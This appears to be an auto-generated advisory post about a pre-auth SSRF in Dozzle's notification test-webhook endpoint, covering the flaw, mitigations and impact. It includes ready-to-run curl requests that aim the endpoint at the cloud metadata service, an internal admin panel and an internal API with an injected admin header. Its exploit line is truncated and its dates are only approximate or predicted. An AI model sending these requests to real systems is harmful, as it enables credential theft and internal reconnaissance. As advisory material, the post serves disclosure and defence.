Listen to this Post
How the mentioned CVE works:
In default Dozzle deploy with no auth provider set, POST /api/notifications/test-webhook is exposed pre-auth. The handler accepts attacker-controlled URL and headers, then passes them to WebhookDispatcher which performs an HTTP POST to that URL. The dispatcher returns the target’s status code and up to 1MB of response body to the attacker when the target replies with non‑2xx. No URL scheme, host, or IP validation occurs. The auth middleware only activates if Provider != NONE; default provider is “none” (args.go, main.go). Thus any network‑reachable IP/port (private subnets, metadata, loopback) can be probed. The reflection sink in webhook.go reads up to 1MB from non‑2xx responses and embeds it into the JSON error field. An attacker can read internal admin panel HTML, cloud IMDS responses, or inject custom headers into downstream requests. The vulnerable commit is 581bab3a… and earlier. Suggested fix: disable test-webhook when auth is NONE, add SSRF hardening, and stop reflecting response bodies.
dailycve form:
Platform: Dozzle Docker
Version: 8.x (commit581bab3a)
Vulnerability: Pre‑auth SSRF reflection
Severity: High (7.5 CVSS)
date: 2024-12-01 (approx)
Prediction: Patch 2024-12-15
Analytics under What Undercode Say:
Check if vulnerable endpoint is exposed
curl -X POST -H "Content-Type: application/json" \
-d '{"url":"http://169.254.169.254/latest/meta-data/","headers":{}}' \
http://target:8080/api/notifications/test-webhook
Extract internal service banners (e.g., internal admin panel)
curl -X POST -H "Content-Type: application/json" \
-d '{"url":"http://192.168.1.1/admin","headers":{}}' \
http://target:8080/api/notifications/test-webhook | jq '.Error'
Header injection to bypass downstream auth
curl -X POST -H "Content-Type: application/json" \
-d '{"url":"http://internal-api/api","headers":{"X-Admin":"true"}}' \
http://target:8080/api/notifications/test-webhook
Exploit:
Send POST to /api/notifications/test-webhook with JSON {“url”:”
Protection from this CVE:
- Set DOZZLE_AUTH_PROVIDER=simple or forward-proxy (requires authentication). 2. Upgrade to version where test-webhook is disabled when auth=NONE. 3. Block /api/notifications/test-webhook via reverse proxy or WAF rule. 4. Apply network egress filtering on Dozzle host to block outbound requests to private IPs and metadata endpoints.
Impact:
Attacker reads internal HTTP response bodies (secrets, configs, tokens), probes internal network topology, scans for open ports, accesses cloud IMDS (potentially harvests IAM credentials), and injects malicious headers into internal services. Full internal network reconnaissance with data exfiltration up to 1MB per request.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

